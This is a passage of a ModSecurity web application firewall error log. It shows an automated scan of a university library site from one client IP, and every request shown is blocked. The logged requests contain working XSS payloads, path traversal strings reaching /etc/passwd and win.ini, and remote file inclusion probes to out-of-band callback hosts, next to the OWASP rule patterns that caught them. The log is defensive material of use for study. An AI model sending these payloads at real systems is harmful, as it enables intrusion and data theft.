"ZO16EcCo-f0AAAqeFPsAAAAx"]
[Tue Aug 29 11:54:41.735984 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAo2nC8AAAAA"]
[Tue Aug 29 11:54:44.640945 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAn41AkAAAAW"]
[Tue Aug 29 11:54:46.599022 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqY564AAAAr"]
[Tue Aug 29 11:54:47.596310 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqXyRYAAAAq"]
[Tue Aug 29 11:54:50.539706 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAo2nEAAAAAA"]
[Tue Aug 29 11:54:50.610888 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqSwlEAAAAN"]
[Tue Aug 29 11:54:50.643928 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAAqTvlsAAAAa"]
[Tue Aug 29 11:54:52.599674 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqRzFMAAAAM"]
[Tue Aug 29 11:54:52.655066 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAApHRZ8AAAAP"]
[Tue Aug 29 11:54:54.640885 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAApbUYQAAAAh"]
[Tue Aug 29 11:54:55.543241 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqWwa0AAAAl"]
[Tue Aug 29 11:54:56.539808 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09uom5rxn76jkn.oast.site found within TX:1: cjmnijtjmimvgniikdb09uom5rxn76jkn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApbUY4AAAAh"]
[Tue Aug 29 11:54:56.727392 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApa-JkAAAAg"]
[Tue Aug 29 11:54:57.539560 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqY59cAAAAr"]
[Tue Aug 29 11:54:57.539630 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAAqY59cAAAAr"]
[Tue Aug 29 11:54:58.212993 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAoAk9YAAAAC"]
[Tue Aug 29 11:54:59.576947 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAApHRbEAAAAP"]
[Tue Aug 29 11:54:59.823865 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAqWwcsAAAAl"]
[Tue Aug 29 11:55:02.878722 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAApa-KsAAAAg"]
[Tue Aug 29 11:55:03.827219 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAApHRb0AAAAP"]
[Tue Aug 29 11:55:04.551718 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqhODAAAAAE"]
[Tue Aug 29 11:55:05.562368 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqsV1sAAAAB"]
[Tue Aug 29 11:55:06.105375 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApHRc0AAAAP"]
[Tue Aug 29 11:55:06.543113 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqhODcAAAAE"]
[Tue Aug 29 11:55:06.596066 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApbUb4AAAAh"]
[Tue Aug 29 11:55:08.605106 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAApa-MEAAAAg"]
[Tue Aug 29 11:55:11.568494 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqsV3gAAAAB"]
[Tue Aug 29 11:55:12.534686 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAAqY6AUAAAAr"]
[Tue Aug 29 11:55:12.664604 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqY6AkAAAAr"]
[Tue Aug 29 11:55:14.529629 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApXgnUAAAAU"]
[Tue Aug 29 11:55:14.649309 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAoz8DwAAAAS"]
[Tue Aug 29 11:55:16.764291 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqTvpYAAAAa"]
